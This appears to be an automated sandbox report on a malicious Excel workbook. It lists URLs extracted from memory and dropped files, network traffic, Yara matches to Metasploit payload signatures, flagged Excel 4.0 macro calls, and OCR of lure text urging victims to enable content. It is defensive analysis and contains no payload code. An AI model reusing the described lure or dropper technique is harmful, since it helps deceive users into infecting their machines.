Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://graph.windows.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://graph.windows.net/
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://help.yahoo.com/kb/account
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://login.windows.local
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://management.azure.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://management.azure.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://messaging.office.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://ncus-000.contentsync.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://officeapps.live.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://onedrive.live.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://outlook.office.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://overview.mail.yahoo.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/cmp/version/3.0.3/cmp.js
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/react-wafer-subscription.SubscriptionReminder.atomic.ltr.cf0f4577b866e
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/react-wafer-subscription.custom.desktop.95c72e8740c6b97fbdb525937d8788
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-footer.FooterDesktop.atomic.ltr.0dabe32d96d30f44862f1509e65
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.HeaderDesktop.atomic.ltr.11873c103003ff0d3521375fdb9
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.MailPreview.atomic.ltr.1d101919d0fcd67e4832e47629894
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.custom.desktop.2ce65662738d6cd781c23fc340c7205c.css
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-hpsetpromo.HpSetBannerPromo.atomic.ltr.b7b5b76bb9c6987dd5d6
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-hpsetpromo.HpSetPromo.atomic.ltr.f9b4b86f21ef1f516530b45567
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-ntk.NTKDesktop.atomic.ltr.94b956089fc91c2f0a244928a927abc9.
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-ntk.custom.desktop.a69916e03ec8f658d9530295bab867ab.css
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.StreamRelated.atomic.ltr.ce56954bd34343adfacf42baec3
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.StreamWide.atomic.ltr.01431f1a963747bd42b012a4d15cd6
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.custom.desktop.35b4e59342f8c72801c502afb5933cff.css
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-trending.Trending.atomic.ltr.3daf50b9757f01b0beab6adecd0b22
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-dialog.UserDialogLite.atomic.ltr.875d949b676096085b14b
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-intent.ContentPreference.atomic.ltr.bbf364e334d48eef59
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-intent.rollupDesktop.atomic.ltr.85ffd965befa53ddf87e9a
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/js/tdv2-wafer-header.custom.desktop.e0cc81c4de21a0aee644ee9285d79117.js
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/js/tdv2-wafer-stream.custom.09abbb0c62340e97edf4c917b11628c4.js
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/scp/css/viewer.620320aff0540f575958990a24cd94ed.css
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/vzm/cs_1.1.3.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/vzm/perf-vitals_1.3.0.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-account-switch-1.1.2.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-autocomplete-1.19.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-beacon-1.3.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-bind-1.1.2.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-clipboard-copy-1.0.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-core-1.43.10.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-countdown-1.2.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-darla-1.0.21.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-drawer-1.0.10.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-dropdown-drawer-1.0.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-fetch-1.16.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-form-1.23.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-geolocation-1.2.9.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-image-1.1.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-menu-1.0.0.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-rapid-1.5.0.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-tabs-1.10.2.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-text-1.1.3.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-toggle-1.13.2.js
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/yc/js/iframe-1.0.26.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/cv/apiv2/default/20191018/EN_US_Yellow_300x250.png)
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/cv/apiv2/default/icons/favicon_y19_32x32_custom.svg
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/cv/apiv2/notifications/default-notif-img.png-168x168.png
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/cv/apiv2/social/images/yahoo_default_logo.png
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/nn/lib/metro/DailyFantasy_BN_Baseball_300x250-min.jpg)
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/nn/lib/metro/g/myy/fallback_grid_0.0.4.css
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/nn/lib/metro/g/sda/sda_flex_0.0.42.css
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/os/yc/css/bundle.c60a6d54.css
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/rq/darla/4-6-0/js/g-r-min.js
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/rz/l/favicon.ico
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/ss/rapid-3.53.17.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/BUky.irBpy2idMZJp.EufA--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/Emg04hx6q7x_kZo7E5_wgA--~B/Zmk9c3RyaW07aD0xOTM7cT05NTt3PTIyMDthcHB
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/GXmFDhVbGWyZvB.4VbCU7w--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/NJBDKYvT49dzIAW1aj4NFA--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/QotT_5MVAG9nDKsSCE8gVA--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/QzM21sk4Ljo_mk7ni0FtpQ--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/UFLqS.xvyj1podCMDQzrLA--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/avZ1m08tUBiHPBtv_CLfAw--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/l_eSHW.xbgQKdH8J9CAEbg--~B/Zmk9c3RyaW07aD0zODg7cT05NTt3PTcyMDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/osujQR2mchEHVk2pUiF4hQ--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: rundll32.exe, 00000006.00000002.250797242.0000000004B00000.00000004.00000001.sdmp String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/ukebcHBGNd6YYmQqOpTWGQ--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHB
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/wYmB0OdYXJ_idrKq3V9SYw--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c7=https%3A%2F%2Fwww.yahoo.com%2F&c5=2023538075&c
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://search.yahoo.com/opensearch.xml
Source: 94101.png.4.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://settings.outlook.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://tasks.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://wus2-000.contentsync.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.verizonmedia.com/advertising
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.verizonmedia.com/careers
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html&quot;
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/index.html
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/terms/otos/index.html
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.yahoo.com/
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://yahoo.uservoice.com/forums/341361-yahoo-home?browser=ie&amp;bucket=FPTRELUG105&amp;os=window
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.3:49709 version: TLS 1.2

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: C:\Users\Public\94101.png2, type: DROPPED Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 Screenshot OCR: Enable editing" from the yellow bar 13 above. 14 15_ Once you have enabled editing, please click
Source: Screenshot number: 8 Screenshot OCR: Enable content' ontheyellow barabo:: 20" , a *this document is completely safety to open 21 22 2
Found Excel 4.0 Macro with suspicious formulas
Source: Presentation_812525.xlsb Initial sample: CALL
Source: Presentation_812525.xlsb Initial sample: CALL
Yara signature match
Source: C:\Users\Public\94101.png2, type: DROPPED Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: classification engine Classification label: mal96.expl.evad.winXLSB@11/14@2/4
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
